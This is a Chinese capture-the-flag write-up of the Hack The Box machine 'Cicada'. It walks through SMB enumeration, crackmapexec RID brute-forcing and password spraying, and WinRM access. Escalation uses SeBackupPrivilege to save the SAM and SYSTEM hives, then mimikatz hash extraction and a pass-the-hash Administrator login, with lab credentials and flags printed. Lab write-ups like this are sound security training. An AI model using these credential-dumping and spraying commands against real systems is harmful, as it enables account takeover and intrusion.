HTB:Cicada[WriteUP]

目录

连接至HTB服务器并启动靶机

使用nmap对靶机进行开放端口扫描

使用nmap对靶机开放端口进行脚本、服务信息扫描

首先尝试空密码连接靶机SMB服务

由于不知道账户名,这里我们使用crackmapexec对smb服务进行用户爆破

通过该账户连接至靶机SMB服务器提取敏感信息

使用david.orelious用户凭证登录靶机SMB服务

使用evil-winrm通过上文凭证连接到靶机WinRM服务

USER_FLAG:0c79a06b429a6c9144e52201714e6328

权限提升

尝试将注册表中的SAM、SYSTEM进行读取保存

ROOT_FLAG:b7c206ec1a5f03f4de21e622502f4005


连接至HTB服务器并启动靶机

靶机IP:10.10.11.35

分配IP:10.10.16.22


使用nmap对靶机进行开放端口扫描

nmap -p- --min-rate=1500 -sS -sU -Pn 10.10.11.35

将输出写入res.txt文件中,并提取端口号存入变量ports

ports=$(cat res.txt | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

使用nmap对靶机开放端口进行脚本、服务信息扫描

nmap -p$ports -sCV 10.10.11.35


首先尝试空密码连接靶机SMB服务

smbclient -L 10.10.11.35

列出HR共享中的所有文件

smbclient -N \\\\10.10.11.35\\HR

Notice from HR.txt文件下载到本地

get "Notice from HR.txt"

查看该文件内容

cat 'Notice from HR.txt'

密码:Cicada$M6Corpb*@Lp#nZp!8


由于不知道账户名,这里我们使用crackmapexec对smb服务进行用户爆破

crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute | grep 'SidTypeUser'

将该输出保存到users.txt文件中,再将所有用户名进行提取

cat users.txt | cut -f 2 -d '\' | cut -f 1 -d ' ' | tee users.txt

使用上文拿到的密码对靶机账户进行密码喷洒

crackmapexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

由输出可见,该密码对账户michael.wrightson生效

账户:michael.wrightson

密码:Cicada$M6Corpb*@Lp#nZp!8


通过该账户连接至靶机SMB服务器提取敏感信息

crackmapexec smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

账户:david.orelious

密码:aRt$Lp#7t*VQ!3


使用david.orelious用户凭证登录靶机SMB服务

smbclient -U david.orelious //10.10.11.35/DEV

Backup_script.ps1文件下载到本地

get Backup_script.ps1

查看该文件内容

cat Backup_script.ps1

账户:emily.oscars

密码:Q!3@Lp#M6b*7t*Vt


使用evil-winrm通过上文凭证连接到靶机WinRM服务

evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

进入C盘根目录

cd C:\

查找user_flag位置

cmd.exe /c dir /s user.txt

可以看到有两个user.txt文件,两个都查看内容发现是一样的

type "C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt"
type "C:\Users\emily.oscars.CICADA\Desktop\user.txt"

*Evil-WinRM* PS C:\> type "C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt"
0c79a06b429a6c9144e52201714e6328
*Evil-WinRM* PS C:\> type "C:\Users\emily.oscars.CICADA\Desktop\user.txt"
0c79a06b429a6c9144e52201714e6328

USER_FLAG:0c79a06b429a6c9144e52201714e6328


权限提升

列出所有用户组

可以看到该用户具有文件备份特权(SeBackupPrivilege)

尝试将注册表中的SAM、SYSTEM进行读取保存

reg save hklm\sam sam
reg save hklm\system system

利用这两个注册表文件抓取靶机管理员密码

.\mimikatz.exe "lsadump::sam /sam:sam /system:system" exit

账户:Administrator

密码:2b87e7c93a3e8a0ea4a581937016f341

利用该哈希值直接通过evil-winrm登录靶机

evil-winrm -i 10.10.11.35 -H '2b87e7c93a3e8a0ea4a581937016f341' -u 'Administrator'

进入C盘根目录下

cd C:\

查找root_flag位置

cmd.exe /c dir /s root.txt

查看root_flag内容

type "C:\Users\Administrator\Desktop\root.txt"

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\
*Evil-WinRM* PS C:\> cmd.exe /c dir /s root.txt
 Volume in drive C has no label.
 Volume Serial Number is 1B60-8905

 Directory of C:\Documents and Settings\Administrator\Desktop

10/30/2024  04:30 PM                34 root.txt
               1 File(s)             34 bytes

 Directory of C:\Users\Administrator\Desktop

10/30/2024  04:30 PM                34 root.txt
               1 File(s)             34 bytes

     Total Files Listed:
               2 File(s)             68 bytes
               0 Dir(s)   1,663,627,264 bytes free
*Evil-WinRM* PS C:\> type "C:\Users\Administrator\Desktop\root.txt"
b7c206ec1a5f03f4de21e622502f4005

ROOT_FLAG:b7c206ec1a5f03f4de21e622502f4005

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/461322.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

17. 云计算和分布式计算

文章目录 第17章 云计算和分布式计算17.1 云基础17.2 云中的故障超时长尾延迟 17.3 利用多个实例提升性能和可用性分布式计算和负载均衡器分布式系统中的状态管理分布式系统中的时间协调分布式系统中的数据协调自动扩展:实例的自动创建和销毁自动扩展虚拟机自动缩放…

【GESP】C++一级知识点研究,cout和printf性能差异分析

一道简单循环输出练习题(BCQM3148,循环输出),由于cout的代码超时问题,让我注意到二者在使用上的差异,遂查阅研究如下。 全文详见:https://www.coderli.com/gesp-knowledge-cout-printf/【GESP】C一级知识点研究&#…

入门 | Kafka数据使用vector消费到Loki中使用grafana展示

一、Loki的基本介绍 1、基本介绍 Loki 是由 Grafana Labs 开发的一款水平可扩展、高性价比的日志聚合系统。它的设计初衷是为了有效地处理和存储大量的日志数据,与 Grafana 生态系统紧密集成,方便用户在 Grafana 中对日志进行查询和可视化操作。 从架构…

Golang | Leetcode Golang题解之第515题在每个树行中找最大值

题目: 题解: func largestValues(root *TreeNode) (ans []int) {if root nil {return}q : []*TreeNode{root}for len(q) > 0 {maxVal : math.MinInt32tmp : qq nilfor _, node : range tmp {maxVal max(maxVal, node.Val)if node.Left ! nil {q …

Vue3的router和Vuex的学习笔记整理

一、路由的基本搭建 1、安装 npm install vue-router --registryhttps://registry.npmmirror.com 2、配置路由模块 第一步:src/router/index.js创建文件 第二步:在src/view下面创建两个vue文件,一个叫Home.vue和About.vue 第三步&#x…

vue插件清除 所有console.log()

一、作用 1、提升性能console.log() 语句会消耗一定的性能,尤其是在频繁调用的情况下。在生产环境中移除这些语句可以提高应用的运行效率。 2、减少信息泄露console.log() 可以输出敏感信息(如用户数据、API 响应等)。在生产环境中&#xf…

vue项目中如何在路由变化时增加一个进度条

在 Vue.js 项目中,使用路由(如 Vue Router)时,为了提升用户体验,你可能会想要在路由变化时显示一个进度条。这可以通过多种方式实现,其中一种流行的做法是使用第三方库,如 vue-loading-bar 或 n…

python 模块和包、类和对象

模块 模块是包含 Python 代码的文件,通常用于组织相关的函数、类和其他语句。模块可以被导入并在其他 Python 文件中使用。 创建模块 假设你创建了一个名为 mymodule.py 的文件,内容如下: # mymodule.pydef greet(name): return f"…

图书管理系统汇报

【1A536】图书管理系统汇报 项目介绍1.用户登录注册功能1. 1用户角色管理2.图书管理功能2.1 添加图书2.2 编辑图书2.3 删除图书 3.图书搜索和筛选3.1 图书搜索3.2 图书筛选 4.图书借阅、图书归还4.1 图书借阅4.2 图书归还 5.用户信息管理5.1上传头像5.2修改头像5.3 修改密码 项…

执行Django项目的数据库迁移命令时报错:(1050, “Table ‘django_session‘ already exists“);如何破?

一、问题描述: 当我们写Django时,由于自己的操作不当,导致执行数据库迁移命令时报错,报错的种类有很多,例如: 迁移文件冲突:可能你有多个迁移文件试图创建同一个表。数据库状态与迁移文件不同…

蓝牙BLE开发——红米手机无法搜索蓝牙设备?

解决 红米手机,无法搜索附近蓝牙设备 具体型号当时忘记查看了,如果你遇到有以下选项,记得打开~ 设置权限

java设计模式之创建者模式(5种)

设计模式 软件设计模式,又称为设计模式,是一套被反复利用,代码设计经验的总结,他是在软件设计过程中的一些不断发生的问题,以及该问题的解决方案。 **创建者模式又分为以下五个模式:**用来描述怎么“将对象…

SpringSecurity框架(入门)

简介: Spring Security 是一个用于构建安全的 Java 应用程序的框架,尤其适用于基于Spring的应用程序。它提供了全面的安全控制,从认证(Authentication)到授权(Authorization),以及…

广东网站设计提升你网站在搜索引擎中的排名

在当今网络盛行的时代,拥有一个设计优良的网站,对企业的在线发展至关重要。特别是对于广东地区的企业来说,网站设计不仅仅是美观的问题,更直接影响着搜索引擎中的排名。因此,精心策划和设计的网站,能够显著…

Cuebric:用AI重新定义3D创作的未来

一、简介 Cuebric 是一家成立于2022年夏天的好莱坞创新公司,致力于为电影、电视、游戏和时尚等行业提供先进的AI多模态SaaS平台。自2024年1月正式推出以来,Cuebric 已经在市场上获得了广泛的认可和积极的反馈。目前,该平台正处于1.0版本的beta测试阶段,已募集约50万美元的…

计算机的错误计算(一百四十)

摘要 探讨 MATLAB 中函数 的计算精度。 从计算机的错误计算(一百三十九)知,对于对数运算,当真数在 1 附近时,计算机的输出会出现较大误差。为此,IEEE 754-2019 中专门定义有函数 其目的就是当自变量在 …

《Python游戏编程入门》注-第4章2

《Python游戏编程入门》的“4.2.2 键盘事件”中介绍了通过键盘事件来监听键盘按键的方法。 1 键盘事件 玩家点击键盘中某个按键实际上包含了两个动作:点击按键和释放按键,也就是按键按下和松开。按键按下的对应的事件是KEYDOWN,按键松开对应…

《高频电子线路》 —— 高频谐振功放(2)

动态特性与负载特性 动态特性 静态特性是指,不考虑负载阻抗的时候获得的,即转移特性曲线和输出特性曲线。 考虑负载时,电流变化的时候,负载上的电压就会变化,管子上面的Vce也会变化。 考虑负载的反作用后&#xff0c…

SpringBoot 下的Excel文件损坏与内容乱码问题

序言 随着打包部署的方式的改变,原本正常运行的代码可能带来一些新的问题,比如我们现在使用SpringBoot 的方式生成Jar包直接运行,就会对我们再在Resource下的Excel文件产生影响,导入与预期不符的情况发生cuiyaonan2000163.com 比…

「Mac畅玩鸿蒙与硬件12」鸿蒙UI组件篇2 - Image组件的使用

在鸿蒙应用开发中,Image 组件用于加载和显示图片资源,并提供多种属性来控制图片的显示效果和适配方式。本篇将带你学习如何在鸿蒙应用中加载本地和远程图片、设置图片样式以及实现简单的图片轮播功能。 关键词 Image 组件图片加载本地资源远程图片图片轮播一、Image 组件基础…